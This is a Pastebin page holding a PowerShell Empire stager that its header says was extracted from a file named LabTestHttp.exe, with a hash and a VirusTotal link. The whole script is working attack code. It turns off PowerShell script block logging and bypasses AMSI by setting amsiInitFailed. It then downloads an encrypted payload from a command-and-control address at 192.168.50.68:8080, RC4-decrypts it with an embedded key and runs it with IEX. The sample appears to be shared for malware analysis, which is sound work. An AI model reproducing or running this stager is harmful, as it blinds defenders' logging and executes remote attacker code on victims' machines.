daily pastebin goal
75%
SHARE
TWEET

LabTestHttp.ps1

a guest Apr 25th, 2018 132 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # PowerShell script (PowerShell Empire stager) extracted from LabTestHttp.exe (8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60)
  2. # https://www.virustotal.com/#/file/8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60/details
  3.  
  4. If ($PSVeRSionTable.PSVersIoN.MAjor -gE 3)
  5. {
  6.     $GPF = [REF].ASSemblY.GEtTyPE('System.Management.Automation.Utils')."GETFie`LD"('cachedGroupPolicySettings', 'N' + 'onPublic,Static');
  7.     IF ($GPF)
  8.     {
  9.         $GPC = $GPF.GEtVAluE($NulL);
  10.         If ($GPC['ScriptB' + 'lockLogging'])
  11.         {
  12.             $GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0;
  13.             $GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
  14.         }
  15.         $val = [COLlecTionS.GeNERic.DIctIoNARY[STrIng, SYStEm.ObJeCt]]::NEw();
  16.         $VAl.ADD('EnableScriptB' + 'lockLogging', 0);
  17.         $VAl.AdD('EnableScriptBlockInvocationLogging', 0);
  18.         $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $VAL
  19.     }
  20.     ElSE
  21.     {
  22.         [SCRiPtBLOCk]."GEtFie`ld"('signatures', 'N' + 'onPublic,Static').SeTVAlue($NuLl, (NEW-ObJECt CoLLEcTIoNs.GENERIc.HASHSeT[STriNG]))
  23.     }
  24.     [Ref].ASSeMblY.GeTTYPe('System.Management.Automation.AmsiUtils') | ?{ $_ } | %{ $_.GetFieLd('amsiInitFailed', 'NonPublic,Static').SETVaLuE($nuLl, $TRue) };
  25. };
  26. [SYSteM.NEt.SerVicEPoinTMaNAger]::EXPECT100CoNTiNUe = 0;
  27. $wc = New-ObjeCt SYSTem.Net.WEbClIEnT;
  28. $u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
  29. $Wc.HeAdErs.ADd('User-Agent', $u);
  30. $Wc.PRoxY = [SYstem.NeT.WEBReQueSt]::DeFaultWEbProXY;
  31. $WC.ProxY.CReDeNtiAlS = [SYSTEm.Net.CrEDenTIAlCacHE]::DefAuLtNeTWorKCredENTIALS;
  32. $Script:Proxy = $wc.Proxy;
  33. $K = [SYSTem.TeXT.ENCODInG]::ASCII.GEtByTEs('x,ZTvr?M[W%8dw7)aIP>*<Opy6hH0Qg|');
  34. $R = {
  35.     $D, $K = $ARGs; $S = 0 .. 255; 0 .. 255 | %{ $J = ($J + $S[$_] + $K[$_ % $K.CouNT]) % 256; $S[$_], $S[$J] = $S[$J], $S[$_] };
  36.     $D | %{ $I = ($I + 1) % 256; $H = ($H + $S[$I]) % 256; $S[$I], $S[$H] = $S[$H], $S[$I]; $_ -BXoR $S[($S[$I] + $S[$H]) % 256] }
  37. };
  38. $ser = 'http://192.168.50.68:8080';
  39. $t = '/login/process.php';
  40. $wc.HeAders.Add("Cookie", "session=U1IMmdBupBXJMDz0Ondvr8vK0Ac=");
  41. $dAtA = $WC.DOwNLoAdDATa($SEr + $T);
  42. $iV = $DatA[0 .. 3];
  43. $data = $DATa[4 .. $dATA.LENgTH]; -jOIn [Char[]](& $R $DATA ($IV + $K)) | IEX
  44. exit
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top